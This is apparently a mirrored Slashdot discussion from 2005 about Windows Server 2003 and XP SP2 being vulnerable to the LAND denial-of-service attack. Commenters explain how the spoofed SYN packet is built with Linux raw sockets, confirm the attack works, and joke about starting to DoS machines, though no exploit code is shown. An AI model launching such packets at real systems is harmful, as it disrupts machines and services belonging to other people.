Slashdot Mirror
Windows 2003 and XP SP2 Vulnerable To LAND Attack
An anonymous reader writes "Dejan Levaja, a Serbian security engineer has discovered that nearly 8 years after the attack was first made public, WIndows 2003 and Windows XP SP2 are in fact vulnerable to the historic LAND attack." Granted, you need to have the firewall turned off for this work, but there's a whole lotta machines that don't have it turned on.
Are only Windows platform vulnerable or will these attacks be successful on other non-ms platforms ?
Trolling using another account since 2005.
Isn't this EXACTLY what regression tests were designed for?
At least with SP2 there is some basic security in terms of the firewall being on by default.
Still, never thought I'd see a slashdot article linking to a page about Trumpet Winsock in 2005!
Get a free iPod Nano 4GB!
A friend showed this to me a few days ago and I was unable to reproduce the attack over the LAN, both with my own code and some code of the original LAND found with google. Both were run from linux by opening a raw socket, filling in ip and tcp headers including checksums using the structs in ip.h and tcp.h, and sending with sendto(). In both cases ethereal would show the packet as recieved but the machine would operate normally.
I have yet to install SP2 because I heard it hurts performance of some computer games, which is mainly what I use my windows PC for.
I am otherwise up-to-date with windows updates. I have a linksys router for my internet connection, but no software firewall.
Am I vulnerable to this and other issues? Should I update to SP2 already (the first time I tried it crashed while installing, didn't even work, but I could prob. get it to work next time). Or should I stay with SP1 for games?
Thank you.
Yes but it does break a few things. And most users have certainly not downloaded zonealarm. Also W2k iirc does not have a built in firewall.
Now granted it is only a DOS attack, but still.
I'd do something interesting, but my server can't handle a slashdotting.
We've moved on to more productive uses of vulnerable machines (e.g. spam zombies). Who wants to do a DOS attack on a machine without a firewall anyway? What's the point?
Have you read my blog lately?
I work in a university. Policy is not to have the Windows firewall turned on because it supposedly conflicts with a few needed applications. There is no hardware firewall whatsoever between the internal network and the outside world.
Oh, and standard policy is to have user accounts set up as Administrator at all times.
Cleaning up infected machines is a never-ending endeavour. Oddly, the few departments run by competent admins (as in, not the university's IT department) where user accounts are set up only as Users (among other things) don't have any security problems at all. I wonder why..
Oh, and before anyone blames me: I'm a grunt with no authority whatsoever. I've voiced my objections to the way things are run, but I can do little more than that.
STOP MISUSING APOSTROPHES, YOU MORONS!!!
I would think that there would still be a lot of people (home users) who are running Windows 95, 98, 2000 or XP unpatched. Not everybody can afford to buy new systems every couple of years, and not everybody would even think of upgrading their operating system, let alone patching it or activating a firewall.
Anakin Simpson: If you're not with me, then you're my enemy--ooh, donuts!
There are people in the US Navy who are actively interested in Linux, but they are heavily outnumbered by fans of Windows and SCO Unix.
It's a small world and it smells funny; I'd buy another if it wasn't for the money; Take back what I paid (SoM)
I pointed this out YEARS ago. I just don't understand why the updated winsock didn't get used in 2k when they overhauled the tcp stack. (and wow is that an old email addy. heh)
Gonzo Granzeau
"Nothing the god of biomechanics wouldn't let you into heaven for.." -Roy Batty
Well, sure, as many people have pointed out, by disabling your firewall you are leaving yourself open to attacks. In addition, the LAND attack is merely a DOS attack and thus does not pose much threat to home computers (and servers would have firewalls).
However, that is far from the point. The point is that 8 years after an attack was discovered, Microsofts commercial OS was STILL vulnerable to it. Obviously, if they're leaving themselves open to such vintage attacks as LAND, their security testing processes can't be all that great can they? What's there to assure us another more dangerous attack won't be discovered in the near future?
At least in my opinion, this is yet another argument for open source. The MS developers that worked on this part of the code probably just threw some old stuff together and called it a day. The module was probably review by few other people and thus such an obvious vulnerabilty was released in the final product. With an open source product like Linux, this kind of stuff rarely if ever happens. So many people are scrutinizing the code that the chances of an obvious vuln going unnoticed are next to nothing.
I guess what I'm saying is, before you leave your critical data to a company propogating closed source products like MS, you should at least make sure they have their proverbial shit together first.
-py
-py
You haven't met many users outside the IT field apparently. I know plenty of family and friends who've turned off the firewall to play some game and oustide the IT field only a single one of my friends or family have heard of ZoneAlarm or anything like it.
this is getting old and so are you
blog
When you get a Dell and turn it on for the first time, you go through a little setup procedure. This is when you *are asked* if you want to turn the firewall on. Turning it on is labled as "recommended".
I would imagine this is the same for any OEM Windows provider.
Had to hack the old land.c to compile on my FC 3 machine, but it works nicely.
Every packet causes about 10 seconds of heavy CPU usage on Windows Server 2003. Ditto for Windows XP SP2.
Processes like a CS server running on the XP box were completely unresponsive. Let the DoSing begin.
- Actually no, this vulnerability showed up 8 years ago and was patched in Windows 98 I believe. So this isn't something new that Microsoft is just now learning about and need to fix, it's something quite old. Since the vulnerability came out ME, 2000 and XP all were released.
Perhaps they setup a firewall to allow them to fix things underneath without totally destroying everyone's networks?- If you're trying to say that MS feels that having the firewall on by default in XP SP2 is a shortcut for fixing problems, well, I certainly HOPE they're not taking that attitude. Yes the firewall needs to be on by default for better security, but they should have tested the OS against
- known vulnerabilities with the firewall off to be certain they wouldn't work. Failure to do so shows some serious problems in MS land.
When you have as large of an installbase as MS does you can't shift things right away or you will lose customers, you have to make changes slowly and incrimentally so that users don't get confused.- You seem royally confused about what this actually is. Land is a DOS attack that is caused by sending a SYN packet to an open port on a machine with the source and destination addresses the same. This isn't something that is _needed_ by any app, it's a TCP/IP oddity, a packet that would normally never occur. Back 8 years ago it was understandable that MS and others didn't anticipate this attack, but after 8 years there's not any excuse.
MS has been working a lot on connectivity over the last year or so with some protocol enhancements and increased IPv6 support. I imagine things are going to get worse before they get better, but don't kid yourself, they are working on fixing it.Simply this is not something users are going to notice the lack of. They'll certainly notice it's there if their machines gets hit with a Land attack though. It is NOT a case of MS trying to make changes slowly to not confuse customers, it's a big blunder.
Ultimately though your defense of MS is unwarranted. They publically declared a while back (1-2 years now I think) that security was going to be a primary focus for them. This was pre-SP2 days. That they re-introduced a vulnerability from eight years ago speaks great volumes about that focus. If MS wants to claim they're security-focused now they deserve the lumps they get for foolish mistakes like this.
Using OpenBSD pf(4):
An IIS server behind this isn't seeing those packets.
Since this attack sends a packet with a source address of the target host rather than the attacker, won't this attack fail in a vast majority of remote situations (i.e. via Internet or not on the same LAN as the target)?? Doesn't almost every ISP filter outgoing packets for a bit of sanity, especially valid (or reasonable) source addresses? I know my ISPs at home (Adelphia cable) and work (AT&T data) do.
-Lod
Believe it or not, some folks still use Solaris 2.5 and 2.6 versions. I used to work at a university whose physics department was fortunate enough to have two electron scanning microscopes, one old and huge and one new, smaller one. The old one had controlling software that was custom, to say the least, and written by a German firm that's been out of business for a few years now.
... unbelievable really), moving *away* from Sendmail, installing Solaris machines with everything locked down, etc, etc). Drove me fucking mad.
Guess what OS the software ran on? And what hardware connections were custom to the old Sparc-based controller the ran the thing? Wohoo! Old Solaris was the only way it'd still 'go'.
Well, sneaker-net wasn't going to work for the grads that were abroad and well, the profs wanted network access, so they were going to get it. Short of the long, we had to build, tweak and mess with all kinds of junk (tcpwrappers, ssh, ssl) before it went back on the network (yes, that donkey had been hacked before). So yes, there's lots of old Solaris still out there.
And before anyone asks, yes I finally quit that job due to *not* being able to secure things like this. Authenticating gateways, openvpn, pf on Solaris (boss would *never* let me put that on all the machines we cared for
You might forget that MS is not a security company.
//Or whatever
Every company that does computer work has to be a security company now. Many companies are completely dependent on computers and most of their crown jewels are stored on them. Many home users have sensitive banking information stored on their computers. Building broken software that allows system disruption or data to be stolen will loose customers. Part of my job is to migrate systems from Windows to Linux, specifically because of security and stability issues.
When you have as large of an installbase as MS does you can't shift things right away or you will lose customers, you have to make changes slowly and incrimentally so that users don't get confused.
That has no bearing whatsoever on this issue. Inserting
if (fromIP == toIP && fromPort == toPort && TCPFlag == 'S') droppacket();
does not break any functionality because it's a packet that should not exist. It's something they fixed in older versions but got lazy and left out of current versions.
I remember when one of my friends (who lives 1000 kms away) was complaining to me about all the MSN Messenger spam she was getting and about how slow her pc was becoming. I had her instsall VNC & started tinkering remotely to see what I could see. I was amazed.
It took about an hour of remote work to set her up in a far more secure way, another few hours to scan & clean all the spyware from her box and she hasn't had a problem since.
I figured it was my good deed of the month and banked the karma, but it goes to show how little the non-IT world cares about security. All they want is:
I could have thrown on 5. Profit! for me, but I didn't want to take advantage of a very close friend who has been there for me for the past 20+ yrs.
Karma: Excellent (Mainly due to Bill & Ted's Karma Adventure)
Yes, it actually works on SP2. Fire up Task Manager and watch CPU load reach 100% for ~10 seconds for a single packet.
Here's the code that should compile on Linux.
Even worse, maybe the leak was caused because people were shoving large objects down there.
In this case, the large object was a land attack, so fixing the pipe and noting that shoving a large object through the pipe did not break it would be expected. However, windows is not a leaky pipe, and it doesn't suffer from cold weather or any other sort of physical degradation. Put simply, this is a known vulnerability that should have been tested as part of QA. It wasn't.
"We returned the General to El Salvador, or maybe Guatemala, it's difficult to tell from 10,000 feet"
That pipe you describe does sound alot like Windows, thats for sure, but honestly, you don't seem to have a clue what this specific bug is and how utterly simple it is to check for and prevent. That Windows is a terrible nightmare to maintain is really no excuse for this.
I've always thought of my driving as being the first line of defense, and my seatbelt as being the second line, there in the case that the first fails. Ideally there shouldn't be any accidents (the software shouldn't self destruct when reading malformed data) but it doesn't hurt to wear your seatbelt, just in case (firewall).
I'm leaving airbags out of this entirely, because studies of them don't seem to show enough improvement to have this explosive device installed in the cabin of the vehicle. Especially since older models (such as the ones I have) can injure adults and kill children.
Getting really off topic - Has anybody ever thought of putting high performance seatbelts in passenger vehicles? You know, extra padding, double belts/belt webs for better weight distribution, etc, like the type used in racing cars?
Although it's a good idea to have an intermediate firewall to catch obviously bogus packets, that's not an excuse for Microsoft to be sloppy.
As for disabling the firewall, while that's probably a bad idea for Joe Home User, what if I want to run my web site off of a Window XP box? Presumably I'm going to have open up a hole to port 80 so people can connect to it. That open port becomes a target for this attack. Firewalls aren't magic pixie dust that just makes everyone bad go away while leaving everything good alone.
(It's possible the firewall has specific code to block this type of bogus packet even on open ports, but that isn't clear. Even if it does it's a bloody stupid.)
To suggest that it's not serious since everyone should just use a firewall is to suggest that Windows XP is not suitable for running network services. While I'm prone to agree, it's hardly a rousing defense of the operating system.
Search 2010 Gen Con events